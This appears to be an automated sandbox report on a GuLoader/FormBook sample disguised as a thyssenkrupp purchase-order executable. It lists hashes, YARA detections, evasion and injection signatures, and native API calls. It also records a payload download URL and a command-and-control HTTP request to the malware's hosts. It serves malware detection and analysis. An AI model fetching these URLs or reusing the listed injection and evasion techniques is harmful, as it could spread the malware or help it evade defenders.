
Analysis Report Purchase Order Updates thyssenkrupp Materials Australia 900-5400006911.exe

Overview

General Information

Sample Name: Purchase Order Updates thyssenkrupp Materials Australia 900-5400006911.exe
Analysis ID: 321085
MD5: 6008cd180e677be4846d5f8abfa6b983
SHA1: 881844503dee7d1797ce7736786dfec08f06100a
SHA256: b8b07584a493c32a6f045b8bfe1f7ce2a2e441035a7048e946aa6b26a6485c0d
Tags: exe, GuLoader

Detection

FormBook, GuLoader
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
System process connects to network (likely due to code injection or exploit)
Yara detected FormBook
Yara detected Generic Dropper
Yara detected GuLoader
Contains functionality to hide a thread from the debugger
Detected RDTSC dummy instruction sequence (likely for instruction hammering)
Executable has a suspicious name (potential lure to open the executable)
Hides threads from debuggers
Initial sample is a PE file and has a suspicious name
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Modifies the prolog of user mode functions (user mode inline hooks)
Queues an APC in another process (thread injection)
Sample uses process hollowing technique
Tries to detect Any.run
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to detect virtualization through RDTSC time measurements
Yara detected VB6 Downloader Generic
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Creates a process in suspended mode (likely to inject code)
Creates processes with suspicious names
Detected potential crypto function
Enables debug privileges
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Uses a Windows Living Off The Land Binaries (LOL bins)
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Startup

  • System is w10x64
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

Memory Dumps

Source | Rule | Description | Author | Strings
00000006.00000002.921168798.0000000002E40000.00000040.00000001.sdmp | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
00000006.00000002.921168798.0000000002E40000.00000040.00000001.sdmp | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
  • 0x98e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x9b62:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x15685:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
  • 0x15171:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
  • 0x15787:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
  • 0x158ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07
  • 0xa57a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
  • 0x143ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
  • 0xb273:$sequence_7: 66 89 0C 02 5B 8B E5 5D
  • 0x1b307:$sequence_8: 3C 54 74 04 3C 74 75 F4
  • 0x1c30a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000006.00000002.921168798.0000000002E40000.00000040.00000001.sdmp | Formbook | detect Formbook in memory | JPCERT/CC Incident Response Group
  • 0x183e9:$sqlite3step: 68 34 1C 7B E1
  • 0x184fc:$sqlite3step: 68 34 1C 7B E1
  • 0x18418:$sqlite3text: 68 38 2A 90 C5
  • 0x1853d:$sqlite3text: 68 38 2A 90 C5
  • 0x1842b:$sqlite3blob: 68 53 D8 7F 8C
  • 0x18553:$sqlite3blob: 68 53 D8 7F 8C
00000006.00000002.920987753.0000000002960000.00000040.00000001.sdmp | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
00000006.00000002.920987753.0000000002960000.00000040.00000001.sdmp | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
  • 0x98e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x9b62:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x15685:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
  • 0x15171:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
  • 0x15787:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
  • 0x158ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07
  • 0xa57a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
  • 0x143ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
  • 0xb273:$sequence_7: 66 89 0C 02 5B 8B E5 5D
  • 0x1b307:$sequence_8: 3C 54 74 04 3C 74 75 F4
  • 0x1c30a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00

Sigma Overview

No Sigma rule has matched

Signature Overview

AV Detection:

Multi AV Scanner detection for submitted file
Source: Purchase Order Updates thyssenkrupp Materials Australia 900-5400006911.exe | Virustotal: Detection: 30%
Source: Purchase Order Updates thyssenkrupp Materials Australia 900-5400006911.exe | ReversingLabs: Detection: 14%
Yara detected FormBook
Source: Yara match | File source: 00000006.00000002.921168798.0000000002E40000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000006.00000002.920987753.0000000002960000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000006.00000002.921197000.0000000002E70000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000001.00000002.757374606.00000000000A0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000001.00000002.761692759.000000001E150000.00000040.00000001.sdmp, type: MEMORY
Source: C:\Users\user\Desktop\Purchase Order Updates thyssenkrupp Materials Australia 900-5400006911.exe | Code function: 4x nop then jne 021F9072h | 0_2_021F879F
Source: C:\Users\user\Desktop\Purchase Order Updates thyssenkrupp Materials Australia 900-5400006911.exe | Code function: 4x nop then jne 021F9072h | 0_2_021F907D
Source: C:\Users\user\Desktop\Purchase Order Updates thyssenkrupp Materials Australia 900-5400006911.exe | Code function: 4x nop then pop ebx | 1_2_000A7AFB
Source: C:\Users\user\Desktop\Purchase Order Updates thyssenkrupp Materials Australia 900-5400006911.exe | Code function: 4x nop then pop edi | 1_2_000AE450
Source: C:\Users\user\Desktop\Purchase Order Updates thyssenkrupp Materials Australia 900-5400006911.exe | Code function: 4x nop then pop edi | 1_2_000B7D4A
Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 4x nop then pop ebx | 6_2_02967AFB
Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 4x nop then pop edi | 6_2_0296E450
Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 4x nop then pop edi | 6_2_02977D4A
Source: global traffic | HTTP traffic detected: GET /ca5e/?9rmT0Zz8=33d4ALcEm9QS3ETZfm99n5/91vkYSjLj82bPV1gW1bkPYk/ky+qZQnI1oXWMSZEPGOwK&rZ=Xn8pd6vp HTTP/1.1 Host: www.yourdfwliving.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: Joe Sandbox View | IP Address: 64.98.145.30
Source: Joe Sandbox View | ASN Name: TUCOWS-3CA
Source: Joe Sandbox View | JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
      Source: cmstp.exe, 00000006.00000002.922184165.00000000054EF000.00000004.00000001.sdmpString found in binary or memory: <li><a rel="nofollow" href="https://twitter.com/hover"><svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 100 100"><circle cx="50" cy="50" r="50" /><g transform="scale(0.3 0.3) translate(-200 -300)"><path d="m 453.82593,412.80619 c -6.3097,2.79897 -13.09189,4.68982 -20.20852,5.54049 7.26413,-4.35454 12.84406,-11.24992 15.47067,-19.46675 -6.79934,4.03295 -14.3293,6.96055 -22.34461,8.53841 -6.41775,-6.83879 -15.56243,-11.111 -25.68298,-11.111 -19.43159,0 -35.18696,15.75365 -35.18696,35.18525 0,2.75781 0.31128,5.44359 0.91155,8.01875 -29.24344,-1.46723 -55.16995,-15.47582 -72.52461,-36.76396 -3.02879,5.19662 -4.76443,11.24048 -4.76443,17.6891 0,12.20777 6.21194,22.97747 15.65332,29.28716 -5.76773,-0.18265 -11.19331,-1.76565 -15.93716,-4.40083 -0.004,0.14663 -0.004,0.29412 -0.004,0.44248 0,17.04767 12.12889,31.26806 28.22555,34.50266 -2.95247,0.80436 -6.06101,1.23398 -9.26989,1.23398 -2.2673,0 -4.47114,-0.22124 -6.62011,-0.63114 4.47801,13.97857 17.47214,24.15143 32.86992,24.43441 -12.04227,9.43796 -27.21366,15.06335 -43.69965,15.06335 -2.84014,0 -5.64082,-0.16722 -8.39349,-0.49223 15.57186,9.98421 34.06703,15.8094 53.93768,15.8094 64.72024,0 100.11301,-53.61524 100.11301,-100.11387 0,-1.52554 -0.0343,-3.04251 -0.10204,-4.55261 6.87394,-4.95995 12.83891,-11.15646 17.55618,-18.21305 z" /></g></svg></a></li> equals www.twitter.com (Twitter)
      Source: cmstp.exe, 00000006.00000002.922184165.00000000054EF000.00000004.00000001.sdmpString found in binary or memory: <li><a rel="nofollow" href="https://www.facebook.com/hover"><svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 100 100"><circle cx="50" cy="50" r="50" /><g transform="scale(0.25 0.25) translate(30 50)"><path d="M182.409,262.307v-99.803h33.499l5.016-38.895h-38.515V98.777c0-11.261,3.127-18.935,19.275-18.935 l20.596-0.009V45.045c-3.562-0.474-15.788-1.533-30.012-1.533c-29.695,0-50.025,18.126-50.025,51.413v28.684h-33.585v38.895h33.585 v99.803H182.409z" /></g></svg></a></li> equals www.facebook.com (Facebook)
Source: unknown | DNS traffic detected: queries for: pilatescollective.com
Source: explorer.exe, 00000004.00000000.741826689.000000000B976000.00000002.00000001.sdmp | String found in binary or memory: http://fontfabrik.com
Source: explorer.exe, 00000004.00000000.720261715.0000000002B50000.00000002.00000001.sdmp | String found in binary or memory: http://www.%s.comPA
Source: explorer.exe, 00000004.00000000.741826689.000000000B976000.00000002.00000001.sdmp | String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
Source: explorer.exe, 00000004.00000000.741826689.000000000B976000.00000002.00000001.sdmp | String found in binary or memory: http://www.carterandcone.coml
Source: explorer.exe, 00000004.00000000.741826689.000000000B976000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com
Source: explorer.exe, 00000004.00000000.741826689.000000000B976000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designers
Source: explorer.exe, 00000004.00000000.741826689.000000000B976000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designers/?
Source: explorer.exe, 00000004.00000000.741826689.000000000B976000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
Source: explorer.exe, 00000004.00000000.741826689.000000000B976000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designers/frere-user.html
Source: explorer.exe, 00000004.00000000.741826689.000000000B976000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designers8
Source: explorer.exe, 00000004.00000000.741826689.000000000B976000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designers?
Source: explorer.exe, 00000004.00000000.741826689.000000000B976000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designersG
Source: explorer.exe, 00000004.00000000.741826689.000000000B976000.00000002.00000001.sdmp | String found in binary or memory: http://www.fonts.com
Source: explorer.exe, 00000004.00000000.741826689.000000000B976000.00000002.00000001.sdmp | String found in binary or memory: http://www.founder.com.cn/cn
Source: explorer.exe, 00000004.00000000.741826689.000000000B976000.00000002.00000001.sdmp | String found in binary or memory: http://www.founder.com.cn/cn/bThe
Source: explorer.exe, 00000004.00000000.741826689.000000000B976000.00000002.00000001.sdmp | String found in binary or memory: http://www.founder.com.cn/cn/cThe
Source: explorer.exe, 00000004.00000000.741826689.000000000B976000.00000002.00000001.sdmp | String found in binary or memory: http://www.galapagosdesign.com/DPlease
Source: explorer.exe, 00000004.00000000.741826689.000000000B976000.00000002.00000001.sdmp | String found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
Source: explorer.exe, 00000004.00000000.741826689.000000000B976000.00000002.00000001.sdmp | String found in binary or memory: http://www.goodfont.co.kr
Source: explorer.exe, 00000004.00000000.741826689.000000000B976000.00000002.00000001.sdmp | String found in binary or memory: http://www.jiyu-kobo.co.jp/
Source: explorer.exe, 00000004.00000000.741826689.000000000B976000.00000002.00000001.sdmp | String found in binary or memory: http://www.sajatypeworks.com
Source: explorer.exe, 00000004.00000000.741826689.000000000B976000.00000002.00000001.sdmp | String found in binary or memory: http://www.sakkal.com
Source: explorer.exe, 00000004.00000000.741826689.000000000B976000.00000002.00000001.sdmp | String found in binary or memory: http://www.sandoll.co.kr
Source: explorer.exe, 00000004.00000000.741826689.000000000B976000.00000002.00000001.sdmp | String found in binary or memory: http://www.tiro.com
Source: explorer.exe, 00000004.00000000.741826689.000000000B976000.00000002.00000001.sdmp | String found in binary or memory: http://www.typography.netD
Source: explorer.exe, 00000004.00000000.741826689.000000000B976000.00000002.00000001.sdmp | String found in binary or memory: http://www.urwpp.deDPlease
Source: explorer.exe, 00000004.00000000.741826689.000000000B976000.00000002.00000001.sdmp | String found in binary or memory: http://www.zhongyicts.com.cn
Source: cmstp.exe, 00000006.00000002.922184165.00000000054EF000.00000004.00000001.sdmp | String found in binary or memory: https://fonts.googleapis.com/css?family=Open
Source: cmstp.exe, 00000006.00000002.922184165.00000000054EF000.00000004.00000001.sdmp | String found in binary or memory: https://help.hover.com/home?source=parked
Source: Purchase Order Updates thyssenkrupp Materials Australia 900-5400006911.exe, 00000001.00000002.757436469.0000000000563000.00000040.00000001.sdmp | String found in binary or memory: https://pilatescollective.com/myguy/anyiba_ivtYLdKxk45.bin
Source: cmstp.exe, 00000006.00000002.922184165.00000000054EF000.00000004.00000001.sdmp | String found in binary or memory: https://twitter.com/hover
Source: cmstp.exe, 00000006.00000002.922184165.00000000054EF000.00000004.00000001.sdmp | String found in binary or memory: https://www.hover.com/?source=parked
Source: cmstp.exe, 00000006.00000002.922184165.00000000054EF000.00000004.00000001.sdmp | String found in binary or memory: https://www.hover.com/about?source=parked
Source: cmstp.exe, 00000006.00000002.922184165.00000000054EF000.00000004.00000001.sdmp | String found in binary or memory: https://www.hover.com/domain_pricing?source=parked
Source: cmstp.exe, 00000006.00000002.922184165.00000000054EF000.00000004.00000001.sdmp | String found in binary or memory: https://www.hover.com/domains/results
Source: cmstp.exe, 00000006.00000002.922184165.00000000054EF000.00000004.00000001.sdmp | String found in binary or memory: https://www.hover.com/email?source=parked
Source: cmstp.exe, 00000006.00000002.922184165.00000000054EF000.00000004.00000001.sdmp | String found in binary or memory: https://www.hover.com/privacy?source=parked
Source: cmstp.exe, 00000006.00000002.922184165.00000000054EF000.00000004.00000001.sdmp | String found in binary or memory: https://www.hover.com/renew?source=parked
Source: cmstp.exe, 00000006.00000002.922184165.00000000054EF000.00000004.00000001.sdmp | String found in binary or memory: https://www.hover.com/tools?source=parked
Source: cmstp.exe, 00000006.00000002.922184165.00000000054EF000.00000004.00000001.sdmp | String found in binary or memory: https://www.hover.com/tos?source=parked
Source: cmstp.exe, 00000006.00000002.922184165.00000000054EF000.00000004.00000001.sdmp | String found in binary or memory: https://www.hover.com/transfer_in?source=parked
Source: cmstp.exe, 00000006.00000002.922184165.00000000054EF000.00000004.00000001.sdmp | String found in binary or memory: https://www.instagram.com/hover_domains
Source: unknown | Network traffic detected: HTTP traffic on port 49748 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49748

E-Banking Fraud:

Yara detected FormBook
Source: Yara match | File source: 00000006.00000002.921168798.0000000002E40000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000006.00000002.920987753.0000000002960000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000006.00000002.921197000.0000000002E70000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000001.00000002.757374606.00000000000A0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000001.00000002.761692759.000000001E150000.00000040.00000001.sdmp, type: MEMORY

System Summary:

Malicious sample detected (through community Yara rule)
Source: 00000006.00000002.921168798.0000000002E40000.00000040.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000006.00000002.921168798.0000000002E40000.00000040.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
Source: 00000006.00000002.920987753.0000000002960000.00000040.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000006.00000002.920987753.0000000002960000.00000040.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
Source: 00000006.00000002.921197000.0000000002E70000.00000004.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000006.00000002.921197000.0000000002E70000.00000004.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
Source: 00000006.00000002.922109924.0000000004FFF000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Auto-generated rule - file scan copy.pdf.r11 | Author: Florian Roth
Source: 00000001.00000002.757374606.00000000000A0000.00000040.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000001.00000002.757374606.00000000000A0000.00000040.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
Source: 00000001.00000002.761692759.000000001E150000.00000040.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000001.00000002.761692759.000000001E150000.00000040.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
Source: 00000006.00000002.921254049.0000000002EBE000.00000004.00000020.sdmp, type: MEMORY | Matched rule: Auto-generated rule - file scan copy.pdf.r11 | Author: Florian Roth
Executable has a suspicious name (potential lure to open the executable)
Source: Purchase Order Updates thyssenkrupp Materials Australia 900-5400006911.exe | Static file information: Suspicious name
Initial sample is a PE file and has a suspicious name
Source: initial sample | Static PE information: Filename: Purchase Order Updates thyssenkrupp Materials Australia 900-5400006911.exe
Source: C:\Users\user\Desktop\Purchase Order Updates thyssenkrupp Materials Australia 900-5400006911.exe | Code function: 0_2_021F0A52 NtSetInformationThread,TerminateProcess | 0_2_021F0A52
Source: C:\Users\user\Desktop\Purchase Order Updates thyssenkrupp Materials Australia 900-5400006911.exe | Code function: 0_2_021F969C NtResumeThread | 0_2_021F969C
Source: C:\Users\user\Desktop\Purchase Order Updates thyssenkrupp Materials Australia 900-5400006911.exe | Code function: 0_2_021F075B EnumWindows,NtSetInformationThread | 0_2_021F075B
Source: C:\Users\user\Desktop\Purchase Order Updates thyssenkrupp Materials Australia 900-5400006911.exe | Code function: 0_2_021F47EE NtSetInformationThread,CreateFileA | 0_2_021F47EE
Source: C:\Users\user\Desktop\Purchase Order Updates thyssenkrupp Materials Australia 900-5400006911.exe | Code function: 0_2_021F9163 NtProtectVirtualMemory | 0_2_021F9163
Source: C:\Users\user\Desktop\Purchase Order Updates thyssenkrupp Materials Australia 900-5400006911.exe | Code function: 0_2_021F559F NtSetInformationThread,NtWriteVirtualMemory | 0_2_021F559F
Source: C:\Users\user\Desktop\Purchase Order Updates thyssenkrupp Materials Australia 900-5400006911.exe | Code function: 0_2_021F8987 NtSetInformationThread,NtWriteVirtualMemory | 0_2_021F8987
Source: C:\Users\user\Desktop\Purchase Order Updates thyssenkrupp Materials Australia 900-5400006911.exe | Code function: 0_2_021F361D NtWriteVirtualMemory | 0_2_021F361D
Source: C:\Users\user\Desktop\Purchase Order Updates thyssenkrupp Materials Australia 900-5400006911.exe | Code function: 0_2_021F9A19 NtResumeThread | 0_2_021F9A19
Source: C:\Users\user\Desktop\Purchase Order Updates thyssenkrupp Materials Australia 900-5400006911.exe | Code function: 0_2_021F9A3D NtResumeThread | 0_2_021F9A3D
Source: C:\Users\user\Desktop\Purchase Order Updates thyssenkrupp Materials Australia 900-5400006911.exe | Code function: 0_2_021F3A2B NtWriteVirtualMemory | 0_2_021F3A2B
Source: C:\Users\user\Desktop\Purchase Order Updates thyssenkrupp Materials Australia 900-5400006911.exe | Code function: 0_2_021F364F NtWriteVirtualMemory | 0_2_021F364F
Source: C:\Users\user\Desktop\Purchase Order Updates thyssenkrupp Materials Australia 900-5400006911.exe | Code function: 0_2_021F9A77 NtResumeThread | 0_2_021F9A77
Source: C:\Users\user\Desktop\Purchase Order Updates thyssenkrupp Materials Australia 900-5400006911.exe | Code function: 0_2_021F9AB0 NtResumeThread | 0_2_021F9AB0
Source: C:\Users\user\Desktop\Purchase Order Updates thyssenkrupp Materials Australia 900-5400006911.exe | Code function: 0_2_021F6AA9 NtSetInformationThread | 0_2_021F6AA9
Source: C:\Users\user\Desktop\Purchase Order Updates thyssenkrupp Materials Australia 900-5400006911.exe | Code function: 0_2_021F96A3 NtResumeThread | 0_2_021F96A3
Source: C:\Users\user\Desktop\Purchase Order Updates thyssenkrupp Materials Australia 900-5400006911.exe | Code function: 0_2_021F9ADD NtResumeThread | 0_2_021F9ADD
Source: C:\Users\user\Desktop\Purchase Order Updates thyssenkrupp Materials Australia 900-5400006911.exe | Code function: 0_2_021F36D7 NtWriteVirtualMemory | 0_2_021F36D7
Source: C:\Users\user\Desktop\Purchase Order Updates thyssenkrupp Materials Australia 900-5400006911.exe | Code function: 0_2_021F96D7 NtResumeThread | 0_2_021F96D7
Source: C:\Users\user\Desktop\Purchase Order Updates thyssenkrupp Materials Australia 900-5400006911.exe | Code function: 0_2_021F06D5 EnumWindows,NtSetInformationThread | 0_2_021F06D5
Source: C:\Users\user\Desktop\Purchase Order Updates thyssenkrupp Materials Australia 900-5400006911.exe | Code function: 0_2_021F3717 NtWriteVirtualMemory | 0_2_021F3717
Source: C:\Users\user\Desktop\Purchase Order Updates thyssenkrupp Materials Australia 900-5400006911.exe | Code function: 0_2_021F9B33 NtResumeThread | 0_2_021F9B33
Source: C:\Users\user\Desktop\Purchase Order Updates thyssenkrupp Materials Australia 900-5400006911.exe | Code function: 0_2_021F3B2B NtWriteVirtualMemory | 0_2_021F3B2B
Source: C:\Users\user\Desktop\Purchase Order Updates thyssenkrupp Materials Australia 900-5400006911.exe | Code function: 0_2_021F3B7B NtWriteVirtualMemory | 0_2_021F3B7B
Source: C:\Users\user\Desktop\Purchase Order Updates thyssenkrupp Materials Australia 900-5400006911.exe | Code function: 0_2_021F9B6D NtResumeThread | 0_2_021F9B6D
Source: C:\Users\user\Desktop\Purchase Order Updates thyssenkrupp Materials Australia 900-5400006911.exe | Code function: 0_2_021F976B NtResumeThread | 0_2_021F976B
Source: C:\Users\user\Desktop\Purchase Order Updates thyssenkrupp Materials Australia 900-5400006911.exe | Code function: 0_2_021F0769 EnumWindows,NtSetInformationThread | 0_2_021F0769
Source: C:\Users\user\Desktop\Purchase Order Updates thyssenkrupp Materials Australia 900-5400006911.exe | Code function: 0_2_021F879F NtProtectVirtualMemory | 0_2_021F879F
Source: C:\Users\user\Desktop\Purchase Order Updates thyssenkrupp Materials Australia 900-5400006911.exe | Code function: 0_2_021F2F90 NtWriteVirtualMemory | 0_2_021F2F90
Source: C:\Users\user\Desktop\Purchase Order Updates thyssenkrupp Materials Australia 900-5400006911.exe | Code function: 0_2_021F37B7 NtWriteVirtualMemory | 0_2_021F37B7
Source: C:\Users\user\Desktop\Purchase Order Updates thyssenkrupp Materials Australia 900-5400006911.exe | Code function: 0_2_021F9BAC NtResumeThread | 0_2_021F9BAC
Source: C:\Users\user\Desktop\Purchase Order Updates thyssenkrupp Materials Australia 900-5400006911.exe | Code function: 0_2_021F3BC5 NtWriteVirtualMemory | 0_2_021F3BC5
Source: C:\Users\user\Desktop\Purchase Order Updates thyssenkrupp Materials Australia 900-5400006911.exe | Code function: 0_2_021F380B NtWriteVirtualMemory | 0_2_021F380B
Source: C:\Users\user\Desktop\Purchase Order Updates thyssenkrupp Materials Australia 900-5400006911.exe | Code function: 0_2_021F0808 NtSetInformationThread | 0_2_021F0808
Source: C:\Users\user\Desktop\Purchase Order Updates thyssenkrupp Materials Australia 900-5400006911.exe | Code function: 0_2_021F3C35 NtWriteVirtualMemory | 0_2_021F3C35
Source: C:\Users\user\Desktop\Purchase Order Updates thyssenkrupp Materials Australia 900-5400006911.exe | Code function: 0_2_021F3855 NtWriteVirtualMemory | 0_2_021F3855
Source: C:\Users\user\Desktop\Purchase Order Updates thyssenkrupp Materials Australia 900-5400006911.exe | Code function: 0_2_021F9C7F NtResumeThread | 0_2_021F9C7F
Source: C:\Users\user\Desktop\Purchase Order Updates thyssenkrupp Materials Australia 900-5400006911.exe | Code function: 0_2_021F986F NtResumeThread | 0_2_021F986F
Source: C:\Users\user\Desktop\Purchase Order Updates thyssenkrupp Materials Australia 900-5400006911.exe | Code function: 0_2_021F0897 NtSetInformationThread | 0_2_021F0897
Source: C:\Users\user\Desktop\Purchase Order Updates thyssenkrupp Materials Australia 900-5400006911.exe | Code function: 0_2_021F3C97 NtWriteVirtualMemory | 0_2_021F3C97
Source: C:\Users\user\Desktop\Purchase Order Updates thyssenkrupp Materials Australia 900-5400006911.exe | Code function: 0_2_021F38B5 NtWriteVirtualMemory | 0_2_021F38B5
Source: C:\Users\user\Desktop\Purchase Order Updates thyssenkrupp Materials Australia 900-5400006911.exe | Code function: 0_2_021F98A4 NtResumeThread | 0_2_021F98A4
Source: C:\Users\user\Desktop\Purchase Order Updates thyssenkrupp Materials Australia 900-5400006911.exe | Code function: 0_2_021F08CF NtSetInformationThread | 0_2_021F08CF
Source: C:\Users\user\Desktop\Purchase Order Updates thyssenkrupp Materials Australia 900-5400006911.exe | Code function: 0_2_021F90CB NtProtectVirtualMemory | 0_2_021F90CB
Source: C:\Users\user\Desktop\Purchase Order Updates thyssenkrupp Materials Australia 900-5400006911.exe | Code function: 0_2_021F38F5 NtWriteVirtualMemory | 0_2_021F38F5
Source: C:\Users\user\Desktop\Purchase Order Updates thyssenkrupp Materials Australia 900-5400006911.exe | Code function: 0_2_021F391A NtWriteVirtualMemory | 0_2_021F391A
Source: C:\Users\user\Desktop\Purchase Order Updates thyssenkrupp Materials Australia 900-5400006911.exe | Code function: 0_2_021F6515 NtSetInformationThread | 0_2_021F6515
Source: C:\Users\user\Desktop\Purchase Order Updates thyssenkrupp Materials Australia 900-5400006911.exe | Code function: 0_2_021F3D3B NtWriteVirtualMemory | 0_2_021F3D3B
Source: C:\Users\user\Desktop\Purchase Order Updates thyssenkrupp Materials Australia 900-5400006911.exe | Code function: 0_2_021F9956 NtResumeThread | 0_2_021F9956
Source: C:\Users\user\Desktop\Purchase Order Updates thyssenkrupp Materials Australia 900-5400006911.exe | Code function: 0_2_021F3962 NtWriteVirtualMemory | 0_2_021F3962
Source: C:\Users\user\Desktop\Purchase Order Updates thyssenkrupp Materials Australia 900-5400006911.exe | Code function: 0_2_021F3D8F NtWriteVirtualMemory | 0_2_021F3D8F
Source: C:\Users\user\Desktop\Purchase Order Updates thyssenkrupp Materials Australia 900-5400006911.exe | Code function: 0_2_021F9189 NtProtectVirtualMemory | 0_2_021F9189
Source: C:\Users\user\Desktop\Purchase Order Updates thyssenkrupp Materials Australia 900-5400006911.exe | Code function: 0_2_021F31E0 NtSetInformationThread | 0_2_021F31E0
Source: C:\Users\user\Desktop\Purchase Order Updates thyssenkrupp Materials Australia 900-5400006911.exe | Code function: 1_2_1E3E9660 NtAllocateVirtualMemory,LdrInitializeThunk | 1_2_1E3E9660
Source: C:\Users\user\Desktop\Purchase Order Updates thyssenkrupp Materials Australia 900-5400006911.exe | Code function: 1_2_1E3E96E0 NtFreeVirtualMemory,LdrInitializeThunk | 1_2_1E3E96E0
Source: C:\Users\user\Desktop\Purchase Order Updates thyssenkrupp Materials Australia 900-5400006911.exe | Code function: 1_2_1E3E9710 NtQueryInformationToken,LdrInitializeThunk | 1_2_1E3E9710
Source: C:\Users\user\Desktop\Purchase Order Updates thyssenkrupp Materials Australia 900-5400006911.exe | Code function: 1_2_1E3E97A0 NtUnmapViewOfSection,LdrInitializeThunk | 1_2_1E3E97A0
Source: C:\Users\user\Desktop\Purchase Order Updates thyssenkrupp Materials Australia 900-5400006911.exe | Code function: 1_2_1E3E9780 NtMapViewOfSection,LdrInitializeThunk | 1_2_1E3E9780
Source: C:\Users\user\Desktop\Purchase Order Updates thyssenkrupp Materials Australia 900-5400006911.exe | Code function: 1_2_1E3E9540 NtReadFile,LdrInitializeThunk | 1_2_1E3E9540
Source: C:\Users\user\Desktop\Purchase Order Updates thyssenkrupp Materials Australia 900-5400006911.exe | Code function: 1_2_1E3E95D0 NtClose,LdrInitializeThunk | 1_2_1E3E95D0
Source: C:\Users\user\Desktop\Purchase Order Updates thyssenkrupp Materials Australia 900-5400006911.exe | Code function: 1_2_1E3E9A20 NtResumeThread,LdrInitializeThunk | 1_2_1E3E9A20
